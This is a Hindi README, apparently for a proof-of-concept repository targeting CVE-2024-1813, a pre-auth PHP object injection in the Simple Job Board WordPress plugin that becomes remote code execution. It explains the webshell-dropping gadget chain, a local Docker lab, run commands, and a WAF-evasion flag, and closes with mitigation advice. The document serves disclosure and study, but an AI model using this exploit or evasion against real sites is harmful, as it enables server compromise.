
CVE-2024-1813 के लिए PoC एक्सप्लॉइट: Simple Job Board WordPress प्लगइन में PHP ऑब्जेक्ट इंजेक्शन, गैजेट चेन के माध्यम से बिना प्रमाणीकरण के RCE प्राप्त करना। सुरक्षित प्रदर्शन के लिए Docker लैब शामिल है।
एंड-टू-एंड: एक अतिथि सार्वजनिक आवेदन फॉर्म के माध्यम से एक serialized PHP ऑब्जेक्ट संग्रहीत करता है, व्यवस्थापक आवेदकों की सूची खोलता है, और गैजेट चेन एक वेबशेल डाल देती है।
Simple Job Board WordPress प्लगइन (PressTigers) में अप्रमाणित PHP Object Injection। एक अतिथि सार्वजनिक आवेदन फॉर्म के माध्यम से एक serialized PHP ऑब्जेक्ट संग्रहीत करता है; जब कोई व्यवस्थापक बाद में आवेदकों की सूची खोलता है, तो प्लगइन इसे unserialize करता है और एक तृतीय-पक्ष गैजेट चेन इसे रिमोट कोड निष्पादन में बदल देती है।
| CVE | CVE-2024-1813 |
| प्लगइन | Simple Job Board (PressTigers) |
| असुरक्षित | ≤ 2.11.0 |
| पैच किया गया | 2.11.1 |
| प्रकार | PHP Object Injection (असुरक्षित deserialization) |
| प्रमाणीकरण | कोई नहीं (pre-auth इंजेक्शन) |
| ट्रिगर | व्यवस्थापक आवेदकों की सूची खोलता है (सामान्य वर्कफ़्लो) |
| CVSS | 9.8 |
📖 पूर्ण तकनीकी लेख: https://mobeta.fr/blog/
यह रिपॉज़िटरी साथ वाली लैब और PoC है। विस्तृत विश्लेषण (मूल कारण, डबल
unserialize, POP चेन बनाना, WAF बायपास) ब्लॉग पोस्ट में है।
.
├── sjb_cve_2024_1813.py # the PoC (builds + sends the payload)
├── LICENSE
└── lab/
├── docker-compose.yml # WordPress + MariaDB + vulnerable plugins
├── setup/setup.sh # one-shot provisioning (wp-cli)
└── trigger_exploit.sh # simulates the admin opening the applicants list
असुरक्षित स्टैक को रिप्रोड्यूस करता है: WordPress 6.9.4 / PHP 8.3 / MariaDB 10.11, Simple Job Board 2.10.8 (source + sink) और All In One SEO 4.5.6 (गैजेट चेन) के साथ।
cd lab
docker compose up -d # boot + auto-provision
docker compose logs setup # prints the site URL, admin creds and job_id
लैब डिफ़ॉल्ट: http://localhost:8081, एडमिन admin / admin123!।
# 1. Store the payload (pre-auth). Replace 4 with the job_id from the setup logs.
python3 sjb_cve_2024_1813.py http://localhost:8081 4 'id > /tmp/RCE_PROOF.txt'
# 2. Fire the sink (plays the admin opening the applicants list).
cd lab && ./trigger_exploit.sh
# 3. Check the result.
docker exec sjb_lab_wp cat /tmp/RCE_PROOF.txt
उपयोगी PoC फ़्लैग:
--print-only - वायर पेलोड बनाकर प्रिंट करता है, कोई नेटवर्क ट्रैफ़िक नहीं।--field - POST फ़ील्ड का नाम (name होना चाहिए; डिफ़ॉल्ट jobapp_full_name)।--int-prefix '+' - serialized length प्रीफ़िक्स का WAF-एवेज़न वैरिएंट।--proxy http://127.0.0.1:8080 - Burp के माध्यम से रूट करें।post_meta पर किसी भी स्पष्ट unserialize() / maybe_unserialize() की ऑडिट करें; unserialize($data, ['allowed_classes' => false]) को प्राथमिकता दें।vendor/composer/installed.json तक सीधी पहुंच ब्लॉक करें ताकि scoped लाइब्रेरी वर्ज़न का फ़िंगरप्रिंट न लिया जा सके।केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। इसे कभी भी किसी सिस्टम पर मालिक की स्पष्ट लिखित अनुमति के बिना न चलाएँ।
MIT - देखें LICENSE।